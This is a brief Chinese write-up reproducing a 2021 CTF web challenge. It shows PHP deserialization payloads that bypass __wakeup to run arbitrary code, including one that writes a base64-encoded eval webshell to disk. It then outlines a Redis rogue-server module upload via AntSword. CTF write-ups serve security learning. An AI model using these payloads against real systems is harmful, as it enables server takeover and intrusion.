[天翼杯 2021]esay_eval复现
利用脚本
https://github.com/Dliv3/redis-rogue-server
antsword插件
https://github.com/Medicean/AS_Redis?tab=readme-ov-file#%E5%B7%B2%E7%9F%A5%E9%97%AE%E9%A2%98
<?php
class A{public $code = "";function __call($method,$args){eval($this->code);}function __wakeup(){$this->code = "";}
}class B{function __destruct(){echo $this->a->a();}
}
if(isset($_REQUEST['poc'])){preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);if (isset($ret[1])) {foreach ($ret[1] as $i) {if(intval($i)!==1){exit("you want to bypass wakeup ? no !");}}unserialize($_REQUEST['poc']); }}else{highlight_file(__FILE__);
}
<?php
class a{public function __construct() {$this->code= "phpinfo();";}public $code = "";}
class b{public function __construct() {$this->a = new A();}public function __destruct(){echo $this->a->a();//方法未定义,call函数被调用}
}
$a=new b();
echo serialize($a);
//O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}
//O:1:"b":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:10:"phpinfo();";}}
//修改类的成员变量数大于类的实际成员变量绕过wakeup函数
查看禁用函数disable_functions
fopen和fputs没有被禁用,写🐎
<?php
$payload=base64_encode('<?php @eval($_POST["123"]);');
class a{public function __construct() {global $payload;$this->code= "fputs(fopen('1.php','w+'),"."base64_decode(\"".$payload."\"));";}public $code = "";}
class b{public function __construct() {$this->a = new A();}public function __destruct(){echo $this->a->a();}
}
$a=new b();
echo serialize($a);
//O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:81:"fputs(fopen('1.php','w+'),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyIxMjMiXSk7"));";}}
//O:1:"b":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:81:"fputs(fopen('1.php','w+'),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyIxMjMiXSk7"));";}}antsword连一下
vim -r config.php.swp 查看swp文件
redis默认端口6379
在html目录下新建456目录,然后把.so文件传上去
antsword加载插件->数据管理->redis管理,输入密码连接上去,执行一波指令
